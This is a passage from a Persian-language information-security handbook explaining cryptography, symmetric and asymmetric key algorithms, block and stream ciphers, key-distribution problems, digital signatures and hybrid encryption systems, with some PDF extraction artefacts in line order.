‫ﺑﺎﺷﺪ ﺁﻥ ﭘﻴﺎﻣﻬﺎ ﺑﺮﺍﻳﺶ ﺑﻲﻣﻔﻬﻮﻡ ﺑﻨﻈﺮ ﺑﻴﺎﻳﺪ‪ .‬ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ ﻳﻚ ﭘﻴﺎﻡ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ٦٩‬ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﻓﺮﺁﻳﻨـﺪ‬
‫ﺑﺎﺯﮔﺸﺖ ﻳﻚ ﭘﻴﺎﻡ ﺭﻣﺰﺷﺪﻩ ﺑﻪ ﻗﺎﻟﺐ ﺍﻭﻟﻴﻪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻣﻨﺎﺳﺐ ﻧﻴﺰ ﺭﻣﺰﮔﺸﺎﻳﻲ‪ ٧٠‬ﻧﺎﻡ ﺩﺍﺭﺩ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺍﻳﻦ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻛﻪ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻳﻚ ﮔﻴﺮﻧﺪﺓ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺍﻃﻼﻋﺎﺕ ﺟﻠﻮﮔﻴﺮﻱ ﻛﻨﺪ‪ .‬ﺍﺯ ﻟﺤﺎﻅ ﻧﻈﺮﻱ ﻭﻗﺘـﻲ ﻗﻄﻌـﻪﺍﻱ ﺍﺯ‬
‫ﺍﻃﻼﻋﺎﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﻮﺩ ﻭ ﺳﭙﺲ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﺗﻮﺳﻂ ﻳﻚ ﺷﺨﺺ ﺛﺎﻟﺚ ﺍﺯ ﻣﻴﺎﻥ ﺭﺍﻩ ﺩﺯﺩﻳـﺪﻩ ﻳـﺎ ﺍﻓـﺸﺎ ﮔـﺮﺩﺩ ﺍﻣﻨﻴـﺖ ﺁﻥ ﺧﺪﺷـﻪﺩﺍﺭ‬
‫ﻧﺨﻮﺍﻫﺪ ﺷﺪ‪ ،‬ﻣﺸﺮﻭﻁ ﺑﺮ ﺁﻧﻜﻪ ﻛﻠﻴﺪ ﻻﺯﻡ ﺑﺮﺍﻱ ﺭﻣﺰﮔـﺸﺎﻳﻲ ﺍﻃﻼﻋـﺎﺕ ﺍﻓـﺸﺎ ﻧـﺸﺪﻩ ﺑﺎﺷـﺪ ﻭ ﺭﻭﺵ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺩﺭ ﻣﻘﺎﺑـﻞ ﺗـﻼﺵ ﺑـﺮﺍﻱ‬
‫ﻲ ﺑﺪﻭﻥ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﻘﺎﻭﻣﺖ ﻛﻨﺪ‪.‬‬
‫ﺭﻣﺰﮔﺸﺎﻳ ﹺ‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻓﺰﺍﻳﺶ ﻣﺤﺮﻣﺎﻧﮕﻲ‪ ،‬ﺭﻣﺰﻧﮕﺎﺭﻱ ﺑﺮﺍﻱ ﺗﻀﻤﻴﻦ ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﻋﺪﻡ ﺗﻜﺬﻳﺐ ﭘﻴﺎﻡ‪ ٧١‬ﻧﻴﺰ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﺗﻮﺍﺑﻊ ﻭ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕﺎﺭﻱ‬
‫ﺍﺳﺎﺳﹰﺎ ﺩﻭ ﻧﻮﻉ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪:‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﻘﺎﺭﻥ‬
‫ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﺍﺯ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣـﺰ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﺷـﻮﺩ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﻣﺘﻘـﺎﺭﻥ ﮔـﺎﻫﻲ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﺳﺮﻱ‪ ٧٢‬ﻭ ﮔﺎﻫﻲ ﻫﻢ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ‪ ٧٣‬ﻧﺎﻣﻴﺪﻩ ﻣـﻲﺷـﻮﻧﺪ‪ .‬ﻣﺘﺄﺳـﻔﺎﻧﻪ ﻫـﺮﺩﻭﻱ ﺍﻳـﻦ ﻧﺎﻣﻬـﺎ ﺑـﻪ‬
‫‪٦٧‬‬
‫ﻳﺎ ‪ privacy‬ﻛﻪ ﮔﺎﻫﻲ ﺑﺎ "ﻣﺤﺮﻣﺎﻧﮕﻲ" )‪ (confidentiality‬ﺑﻪ ﺟﺎﻱ ﻫﻢ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ ﻭ ﮔﺎﻫﻲ ﻫﻢ ﺑﻪ ﻃﻮﺭ ﺟﺰﺋﻲﺗﺮ ﺑﻪ ﻣﺤﻔﺎﻇﺖ ﺍﺯ ﺍﻃﻼﻋـﺎﺕ ﺷﺨـﺼﻲ ﺍﻓـﺮﺍﺩ ﮔﻔﺘـﻪ‬
‫ﻣﻲﺷﻮﺩ‪.‬‬
‫‪Cryptography‬‬
‫‪Encryption‬‬
‫‪Decryption‬‬
‫‪Message Non-Repudiation‬‬
‫‪Secret Key Algorithms‬‬
‫‪Private Key Algorithms‬‬
‫‪68‬‬
‫‪69‬‬
‫‪70‬‬
‫‪71‬‬
‫‪72‬‬
‫‪73‬‬
‫‪٢٩٢‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺳﺎﺩﮔﻲ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ‪ ٧٤‬ﻛﻪ ﺍﺭﺗﺒﺎﻃﻲ ﺑﺎ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻧﺪﺍﺭﻧﺪ ﺍﺷﺘﺒﺎﻩ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﻧﺪ‪ .‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎﻱ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺭﺍ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺩﻭ ﺩﺳﺘﻪ ﺗﻘﺴﻴﻢ ﻧﻤﻮﺩ‪ :‬ﺍﻟﮕﻮﺭﻳﺘﻬﺎﻱ ﺑﻠﻮﻙ‪ ،٧٥‬ﻭ ﺍﻟﮕﻮﺭﻳﺘﻬﺎﻱ ﺟﺎﺭﻱ‪ .٧٦‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺑﻠﻮﻙ‪ ،‬ﺩﺍﺩﻩﻫﺎﻱ ﻳـﻚ‬
‫ﺑﻠﻮﻙ )ﺗﻌﺪﺍﺩﻱ ﺑﺎﻳﺖ( ﺭﺍ ﺩﺭ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣﺎﻧﻲ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻛﻨﻨﺪ‪ ،‬ﺩﺭﺣﺎﻟﻴﻜﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﺟﺎﺭﻱ ﺁﻧﻬﺎ ﺭﺍ ﺑﺎﻳﺖ ﺑﻪ ﺑﺎﻳﺖ )ﻳﺎ ﺣﺘﻲ ﺑﻴـﺖ ﺑـﻪ ﺑﻴـﺖ(‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﻧﻤﺎﻳﻨﺪ‪.‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻣﻮﺗـﻮﺭ ﻣﺤﺮﻛـﺔ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﻧﮕـﺎﺭﻱ ﻣـﺪﺭﻥ ﻫـﺴﺘﻨﺪ‪ .‬ﺍﻳـﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬـﺎ ﻋﻤﻮﻣـﹰﺎ ﺑـﺴﻴﺎﺭ ﺳـﺮﻳﻌﺘﺮ ﺍﺯ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻫﺴﺘﻨﺪ ﻭ ﻛﻤﺎﺑﻴﺶ ﭘﻴﺎﺩﻩﺳﺎﺯﻱﺷﺎﻥ ﺳﺎﺩﻩﺗﺮ ﺍﺳﺖ‪ .‬ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺳﻪ ﻣـﺸﻜﻞ‬
‫ﺩﺍﺭﻧﺪ ﻛﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﺭﺍ ﺩﺭ ﺩﻧﻴﺎﻱ ﻭﺍﻗﻌﻲ ﻣﺤﺪﻭﺩ ﻣﻲﻛﻨﺪ‪:‬‬
‫•‬
‫ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﻃﺮﻓﻴﻦ ﺍﺭﺗﺒﺎﻁ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺘﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺑﺼﻮﺭﺕ ﺍﻳﻤﻦ ﺑﻪ ﺗﺒـﺎﺩﻝ ﺍﻃﻼﻋـﺎﺕ ﺑﭙﺮﺩﺍﺯﻧـﺪ‪،‬‬
‫ﺍﺑﺘﺪﺍ ﺑﺎﻳﺪ ﻳﻚ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺒﺎﺩﻟﻪ ﻛﻨﻨﺪ‪ .‬ﻣﺒﺎﺩﻟﻪ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺑﺼﻮﺭﺕ ﺍﻣﻦ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺴﻴﺎﺭ ﺩﺷﻮﺍﺭ ﺑﺎﺷﺪ‪.‬‬
‫•‬
‫ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺁﻧﻬﺎ ﻣﻲﺧﻮﺍﻫﻨﺪ ﺍﺭﺳﺎﻝ ﻭ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﻛﻨﻨﺪ‪ ،‬ﻫﺮ ﺩﻭ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺑﺎﻳﺪ ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﻛﻠﻴـﺪ ﺭﻣـﺰ ﺭﺍ ﻧـﺰﺩ ﺧـﻮﺩ ﺩﺍﺷـﺘﻪ‬
‫ﺑﺎﺷﻨﺪ ﻭ ﺁﻧﺮﺍ ﺍﻳﻤﻦ ﻧﮕﻬﺪﺍﺭﻧﺪ‪ .‬ﺍﮔﺮ ﻛﻠﻴﺪ ﻳﻜﻲ ﺍﺯ ﻃﺮﻓﻴﻦ ﺍﺭﺗﺒﺎﻁ ﻣﺨﺪﻭﺵ ﺷﻮﺩ ﻭ ﻃﺮﻑ ﺩﻳﮕﺮ ﺍﺯ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺧﺒﺮ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ‪ ،‬ﻣﻤﻜﻦ‬
‫ﺍﺳﺖ ﻃﺮﻑ ﺩﻭﻡ ﺍﺭﺗﺒﺎﻁ ﺑﺮﺍﻱ ﻃﺮﻑ ﺍﻭﻝ ﭘﻴﺎﻣﻲ ﺍﺭﺳﺎﻝ ﻛﻨﺪ ‪ -‬ﻭ ﺁﻧﮕﺎﻩ ﺁﻥ ﭘﻴﺎﻡ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺨﺪﻭﺵﺷﺪﻩ ﻣـﻮﺭﺩ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﺑﮕﻴﺮﺩ‪.‬‬
‫•‬
‫ﺍﮔﺮ ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺎﻳﻞ ﺑﺎﺷﻨﺪ ﺑﺮﺍﻱ ﺍﻳﻤﻦ ﻛﺮﺩﻥ ﺍﺭﺗﺒﺎﻁ ﺍﺯ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ ﻫﺮ ﺍﺭﺗﺒﺎﻁ ﺩﻭﻧﻔﺮﻩ ﺑـﻪ ﻳـﻚ ﻛﻠﻴـﺪ ﺭﻣـﺰ‬
‫ﻣﻨﺤﺼﺮ ﺑﻪ ﻓﺮﺩ ﻧﻴﺎﺯ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ ،‬ﻛﻪ ﺍﻳﻦ ﺑﺮﺍﻱ ‪ N‬ﻛﺎﺭﺑﺮ ﻣﺘﻔﺎﻭﺕ ﻣـﺴﺘﻠﺰﻡ ‪ (N2 - N) / 2‬ﻛﻠﻴـﺪ ﻣـﻲﺷـﻮﺩ‪ .‬ﺑـﺎ ﺍﻓـﺰﺍﻳﺶ ﺗﻌـﺪﺍﺩ‬
‫ﻛﺎﺭﺑﺮﺍﻥ‪ ،‬ﺍﻳﻦ ﻋﺪﺩ ﺑﺴﺮﻋﺖ ﻏﻴﺮﻗﺎﺑﻞ ﻛﻨﺘﺮﻝ ﺧﻮﺍﻫﺪ ﺷﺪ‪.‬‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻧﺎﻣﺘﻘﺎﺭﻥ‬
‫ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻳﻚ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﭘﻴﺎﻡ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ ﻭ ﻛﻠﻴﺪ ﺩﻳﮕﺮ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ‪ .‬ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ‬
‫ﻻ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺭﺍ ﻛﻠﻴﺪ ﺭﻣـﺰ ﻫﻤﮕـﺎﻧﻲ‪ ٧٧‬ﻣـﻲﻧﺎﻣﻨـﺪ‪،‬‬
‫ﻳﻚ ﺩﺳﺘﺔ ﻣﻬﻢ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻧﺎﻣﺘﻘﺎﺭﻥ ﺍﺳﺖ‪ .‬ﺩﺭ ﺍﻳﻦ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﭼﻮﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻳﻨﻜﻪ ﺧﺪﺷﻪﺍﻱ ﺑﻪ ﺳﺮﻱ ﺑﻮﺩﻥ ﭘﻴﺎﻡ ﻳﺎ ﻛﻠﻴﺪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻭﺍﺭﺩ ﺷﻮﺩ ﺩﺭ ﺩﺳـﺘﺮﺱ ﻫﻤﮕـﺎﻥ ﻗـﺮﺍﺭ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ‪ .‬ﻛﻠﻴـﺪ‬
‫ﻻ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ" ﻳﺎ "ﻛﻠﻴﺪ ﺭﻣﺰ ﺳﺮﻱ" ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺭﻣﺰﮔﺸﺎﻳﻲ ﭘﻴﺎﻡ ﻧﻴﺰ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺑﺎ ﻣﺠﺰﺍ ﻛﺮﺩﻥ ﻛﻠﻴﺪﻫﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ‪ ،‬ﻣﺸﻜﻼﺕ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﮐﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﺭﺍ ﺗﺎ ﺣﺪﻭﺩ‬
‫ﺯﻳﺎﺩﻱ ﺣﻞ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺍﺯ ﺩﻳﺪ ﻣﺒﺘﻨﻲ ﺑﺮ ﺗﺌﻮﺭﻱ‪ ،‬ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺑﻄﻮﺭ ﻧﺴﺒﻲ ﻛﺎﺭ ﺍﺭﺳﺎﻝ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ ﺭﺍ ﺑﺮﺍﻱ ﺍﻓﺮﺍﺩ ﺁﺳﺎﻥ‬
‫ﻣﻲﻛﻨﺪ‪ .‬ﻃﺒﻴﻌﺘﹰﺎ ﺍﻓﺮﺍﺩﻱ ﻛﻪ ﻣﺎﻳﻠﻨﺪ ﭘﻴﺎﻣﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱﺷـﺪﻩ ﺩﺭﻳﺎﻓـﺖ ﻛﻨﻨـﺪ ﻛﻠﻴـﺪﻫﺎﻱ ﻫﻤﮕـﺎﻧﻲ ﺧـﻮﺩ ﺭﺍ ﺩﺭ ﻓﻬﺮﺳـﺘﻬﺎﻱ ﻋﻤـﻮﻣﻲ ﻳـﺎ‬
‫ﮐﺘﺎﺑﭽﻪﻫﺎﻱ ﺭﺍﻫﻨﻤﺎ ﻣﻨﺘﺸﺮ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺑﻪ ﺳﺎﺩﮔﻲ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺳﻲ ﺑﺎﺷﺪ‪ .‬ﺁﻧﮕﺎﻩ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﻳﻚ ﭘﻴﺎﻡ ﺭﻣﺰﮔﺬﺍﺭﻱﺷﺪﻩ‪ ،‬ﺗﻨﻬﺎ ﻛﺎﺭﻱ ﻛـﻪ ﺑﺎﻳـﺪ‬
‫ﺍﻧﺠﺎﻡ ﺩﻫﻴﻢ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻓﺮﺩ ﺭﺍ ﺑﻴﺎﺑﻴﻢ‪ ،‬ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻨﻴﻢ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺮﺍﻳﺶ ﺍﺭﺳـﺎﻝ ﻧﻤـﺎﻳﻴﻢ‪ .‬ﺩﺭ ﻳـﻚ ﺳﻴـﺴﺘﻢ‬
‫ﺧﻮﺏ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺗﻨﻬﺎ ﻛﺴﻲ ﻛﻪ ﻣﻲﺗﻮﺍﻧﺪ ﭘﻴﺎﻡ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ ﻛﺴﻲ ﺍﺳﺖ ﻛﻪ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧـﺼﻮﺻﻲ ﻣﺘﻨـﺎﻇﺮ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴـﺎﺭ ﺩﺍﺭﺩ‪.‬‬
‫ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﺗﻨﻬﺎ ﭼﻴﺰﻱ ﻛﻪ ﻻﺯﻡ ﺍﺳﺖ ﺩﺭ ﺩﺳﺘﮕﺎﻩ ﺧﻮﺩ ﺫﺧﻴﺮﻩ ﻛﻨﻴﻢ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﺧﻮﺩﻣﺎﻥ ﺍﺳﺖ‪.‬‬
‫ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﭘﺪﻳﺪ ﺁﻭﺭﺩﻥ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﮐﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪ .‬ﻳﻚ ﺍﻣـﻀﺎﻱ ﺩﻳﺠﻴﺘـﺎﻟﻲ ﻣﺎﻧﻨـﺪ ﻳـﻚ ﺍﻣـﻀﺎﻱ‬
‫ﺣﻘﻴﻘﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺮﺍﻱ ﻧﺸﺎﻥ ﺩﺍﺩﻥ ﻳﻚ ﻫﻮﻳﺖ ﺑﻜﺎﺭ ﺭﻭﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺠﺎ ﻧﻴﺰ ﻣﺜﻞ ﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﻏﺬﻱ ﻣﻲﺗﻮﺍﻧﻴﺪ ﻳـﻚ ﻧﺎﻣـﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ﺭﺍ ﺍﻣـﻀﺎ‬
‫ﻛﻨﻴﺪ ﻭ ﺑﺪﻳﻦ ﺗﺮﺗﻴﺐ ﺍﺯ ﻧﻮﺷﺘﻪﺷﺪﻥ ﺁﻥ ﺗﻮﺳﻂ ﺧﻮﺩ ﺑﻪ ﺩﻳﮕﺮﺍﻥ ﺍﻃﻤﻴﻨﺎﻥ ﺩﻫﻴﺪ؛ ﻭ ﻣﺎﻧﻨﺪ ﺍﻣﻀﺎﻱ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﻣﻮﺍﻓﻘﻨﺎﻣﻪ ﻓﺮﻭﺵ ﻣـﻲ‪-‬‬
‫ﺗﻮﺍﻧﻴﺪ ﻳﻚ ﺳﻨﺪ ﻣﻌﺎﻣﻼﺗﻲ ﺭﺍ ﻧﻴﺰ ﺑﺼﻮﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﻣﻀﺎ ﻛﻨﻴﺪ ﺗﺎ ﻧﺸﺎﻥ ﺩﻫﻴﺪ ﻛـﻪ ﻣﺎﻳﻠﻴـﺪ ﻛـﺎﻻﻳﻲ ﺭﺍ ﺳـﻔﺎﺭﺵ ﺩﺍﺩﻩ ﻳـﺎ ﺑﻔﺮﻭﺷـﻴﺪ‪ .‬ﺩﺭ‬
‫‪Public Key Algorithms‬‬
‫‪Block Algorithms‬‬
‫‪Stream Algorithms‬‬
‫‪Public Key‬‬
‫‪74‬‬
‫‪75‬‬
‫‪76‬‬
‫‪77‬‬
‫‪٢٩٣‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫ﻓﻨﺎﻭﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ‪ ،‬ﺍﺯ ﻛﻠﻴﺪ ﺭﻣﺰ ﺧﺼﻮﺻﻲ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻣﻀﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ؛ ﻭ ﻟﺬﺍ ﺳﺎﻳﺮﻳﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻣﺘﻨﺎﻇﺮ ﺍﺯ ﺻﺤﺖ ﺍﻣﻀﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻧﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﺍﺯ ﻧﻈﺮ ﻣﺤﺎﺳﺒﺎﺗﻲ ﭘﺮﻫﺰﻳﻨﻪ ﻫﺴﺘﻨﺪ‪ .‬ﺩﺭ ﻋﻤﻞ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ ﻭ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕـﺎﻧﻲ ﺑـﻪ‬
‫ﻗﺪﺭﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ ۱۰۰۰‬ﺑﺮﺍﺑﺮ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻣﺘﻘﺎﺭﻥ ﻣﻌﺎﺩﻝ ﺧﻮﺩ ﻧﻴﺎﺯ ﺩﺍﺭﺩ‪ .‬ﺑﺮﺍﻱ ﺍﻳﻨﻜﻪ ﺍﺯ ﻣﺰﺍﻳﺎﻱ ﻛﻠﻴﺪ ﺭﻣﺰ ﻫﻤﮕﺎﻧﻲ ﻭ ﻧﻴـﺰ‬
‫ﺍﺯ ﺳﺮﻋﺖ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﺘﻘﺎﺭﻥ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩ ﺑﺎﺷﺪ‪ ،‬ﺑﻴﺸﺘﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﻣﺰﮔـﺬﺍﺭﻱ ﺟﺪﻳـﺪ ﺩﺭ ﻭﺍﻗـﻊ ﺍﺯ ﻳـﻚ ﺗﺮﻛﻴـﺐ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﻣﻲﻛﻨﻨﺪ‪:‬‬
‫ﺳﻴﺴﺘﻢ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻋﻤﻮﻣﻲ ‪ /‬ﺧﺼﻮﺻﻲ ﺩﻭﮔﺎﻧﻪ‬
‫‪٧٨‬‬
